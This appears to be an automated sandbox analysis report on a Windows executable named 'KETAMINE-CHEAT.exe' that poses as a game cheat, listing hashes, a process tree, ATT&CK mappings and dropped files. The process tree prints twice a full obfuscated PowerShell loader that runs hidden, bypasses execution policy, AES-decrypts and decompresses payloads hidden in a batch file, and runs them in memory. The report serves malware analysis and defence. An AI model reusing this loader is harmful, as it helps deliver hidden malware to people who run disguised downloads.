0b91dcd612854adf2c540689f4576c164d42e4b8a5c3646203f9da54257c45cf

General

Target

New folder/KETAMINE-CHEAT.exe
Size

704KB
MD5

ec00d1aeed783336a6e3491a5718133d
SHA1

dea299c6ea1c07fe8d33062353744a4c4bbdcea0
SHA256

d0dd7a5e6716487963ba798b5c05fddc98884e3b9a13be3470d36937ba703dec
SHA512

8931972fe3533f5c894d98546e450ac384e6a2bf3cbdc09fcedb1bd529a156191eced25df18186cc08130e915b242ba3ac675406316407cd33712897a8dc3801
SSDEEP

12288:NPunE2KxcEOwiaNMSZwmbWxXaK8LAm2jzOe4ccnEL6RYv9d4Q/:+P2da5GLpKD4cWE+RYvF

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1440	hello.exe

Loads dropped DLL 2 IoCs

pid	Process
1512	KETAMINE-CHEAT.exe
1512	KETAMINE-CHEAT.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2112	powershell.exe
2752	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 2368	1512	KETAMINE-CHEAT.exe	28
PID 1512 wrote to memory of 2368	1512	KETAMINE-CHEAT.exe	28
PID 1512 wrote to memory of 2368	1512	KETAMINE-CHEAT.exe	28
PID 1512 wrote to memory of 1440	1512	KETAMINE-CHEAT.exe	30
PID 1512 wrote to memory of 1440	1512	KETAMINE-CHEAT.exe	30
PID 1512 wrote to memory of 1440	1512	KETAMINE-CHEAT.exe	30
PID 2368 wrote to memory of 2144	2368	cmd.exe	31
PID 2368 wrote to memory of 2144	2368	cmd.exe	31
PID 2368 wrote to memory of 2144	2368	cmd.exe	31
PID 1440 wrote to memory of 2596	1440	hello.exe	32
PID 1440 wrote to memory of 2596	1440	hello.exe	32
PID 1440 wrote to memory of 2596	1440	hello.exe	32
PID 2144 wrote to memory of 2644	2144	net.exe	33
PID 2144 wrote to memory of 2644	2144	net.exe	33
PID 2144 wrote to memory of 2644	2144	net.exe	33
PID 2596 wrote to memory of 2236	2596	cmd.exe	35
PID 2596 wrote to memory of 2236	2596	cmd.exe	35
PID 2596 wrote to memory of 2236	2596	cmd.exe	35
PID 2236 wrote to memory of 2556	2236	net.exe	36
PID 2236 wrote to memory of 2556	2236	net.exe	36
PID 2236 wrote to memory of 2556	2236	net.exe	36
PID 2368 wrote to memory of 2112	2368	cmd.exe	37
PID 2368 wrote to memory of 2112	2368	cmd.exe	37
PID 2368 wrote to memory of 2112	2368	cmd.exe	37
PID 2596 wrote to memory of 2752	2596	cmd.exe	38
PID 2596 wrote to memory of 2752	2596	cmd.exe	38
PID 2596 wrote to memory of 2752	2596	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\New folder\KETAMINE-CHEAT.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\KETAMINE-CHEAT.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\XClient.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:2644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZyunlpjDuREdU2M686QeyhGLd/9/V2sLG5kMPZTs5r4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhIctKXujiK2gckoW8dcbw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BeuAp=New-Object System.IO.MemoryStream(,$param_var); $XwaSC=New-Object System.IO.MemoryStream; $HwkYx=New-Object System.IO.Compression.GZipStream($BeuAp, [IO.Compression.CompressionMode]::Decompress); $HwkYx.CopyTo($XwaSC); $HwkYx.Dispose(); $BeuAp.Dispose(); $XwaSC.Dispose(); $XwaSC.ToArray();}function execute_function($param_var,$param2_var){ $wipWa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aCKZP=$wipWa.EntryPoint; $aCKZP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\XClient.bat';$oyQri=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\XClient.bat').Split([Environment]::NewLine);foreach ($qDozU in $oyQri) { if ($qDozU.StartsWith(':: ')) { $whQZb=$qDozU.Substring(3); break; }}$payloads_var=[string[]]$whQZb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- C:\Users\Admin\AppData\Local\hello.exe
  "C:\Users\Admin\AppData\Local\hello.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13DE.tmp\13DF.tmp\13E0.bat C:\Users\Admin\AppData\Local\hello.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2236
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:2556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZyunlpjDuREdU2M686QeyhGLd/9/V2sLG5kMPZTs5r4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhIctKXujiK2gckoW8dcbw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BeuAp=New-Object System.IO.MemoryStream(,$param_var); $XwaSC=New-Object System.IO.MemoryStream; $HwkYx=New-Object System.IO.Compression.GZipStream($BeuAp, [IO.Compression.CompressionMode]::Decompress); $HwkYx.CopyTo($XwaSC); $HwkYx.Dispose(); $BeuAp.Dispose(); $XwaSC.Dispose(); $XwaSC.ToArray();}function execute_function($param_var,$param2_var){ $wipWa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aCKZP=$wipWa.EntryPoint; $aCKZP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\hello.exe';$oyQri=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\hello.exe').Split([Environment]::NewLine);foreach ($qDozU in $oyQri) { if ($qDozU.StartsWith(':: ')) { $whQZb=$qDozU.Substring(3); break; }}$payloads_var=[string[]]$whQZb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('C:\Users\Admin\AppData\Local\hello.exe'));
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\13DE.tmp\13DF.tmp\13E0.bat

Filesize
285KB

MD5
333e3186bc209041d294e11e2c65a052

SHA1
aeae199bf2aff2204e4c256cb3aef64fbb254b7f

SHA256
bdafd08fe990412211cdf96c9474bf58fc90c5164d7c4a3226853099ce5e5958

SHA512
382035cbef19aa1fcc3216232dcf92c535c126bc015c976b3ad1959af934cc62dabb250d8083dbd01a1f966f8d455f8391cadedbbe55b3d7056dffff20d13658

Download Submit
C:\Users\Admin\AppData\Local\XClient.bat

Filesize
286KB

MD5
e44c02291aba12dc736282dda16dd900

SHA1
25f0f2c50b4fe6ed7df1bb537891ed89a43f6ece

SHA256
c45bc03f8edea26265087080f0b244fbc4f3c6ed17b7fcd87f7ca0fca2bb3ca0

SHA512
a0b4a2ed00733f489894824dc9fd195a2b61801c5e2d4a417bdf8dd7bf5f3ddf5615442acd0ae053e3dca91c04dc85297fe6139d09a7262a399f5758f33874dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JV8U26NLYV0T2IA1XTBA.temp

Filesize
7KB

MD5
fb8709bec6bf2fca0a92db9dce0463b3

SHA1
1d9a05104f1de7c6c5dd466d3bb14f0d156e3e35

SHA256
f3e740cf9ed02d7027e193e4e811d34dc4b76788c65602c674ad65135a836006

SHA512
86b66acb68c03bf43613ce51a16d6437b093963e84ac52a3e25c5aadaa9dfba0b612adc52b6361462ee609460ff4f789e86d8173b0ba3dcb7cd1bb72e41d9a31

Download Submit
\Users\Admin\AppData\Local\hello.exe

Filesize
405KB

MD5
745e52027f7364b1475a181a1fbc8e99

SHA1
73ab36e80a66ef37b2c9df394832a4dc26924ce3

SHA256
45cd85c4459eb5f19fc8db2a4de45a3b3edb257e3ad391bdf0e6fb11b7aec4b4

SHA512
3318aeaa40e4698573acb0c8d22649704ed06cb560c0cec6ab5a61cbf5d5e16e46b4d6bd50ee32e67bbcfdf9381a2bca6f0d496d653625eeed50dd735215abd2

Download Submit
memory/1512-1-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/1512-0-0x0000000000C50000-0x0000000000D06000-memory.dmp

Filesize
728KB

Download
memory/1512-20-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/2112-29-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2112-42-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-30-0x0000000001D20000-0x0000000001D28000-memory.dmp

Filesize
32KB

Download
memory/2112-32-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2112-28-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-48-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-27-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2112-44-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2112-33-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2752-39-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2752-40-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2752-43-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2752-41-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2752-46-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

Filesize
9.6MB

Download
memory/2752-45-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download
memory/2752-38-0x0000000002C70000-0x0000000002CF0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing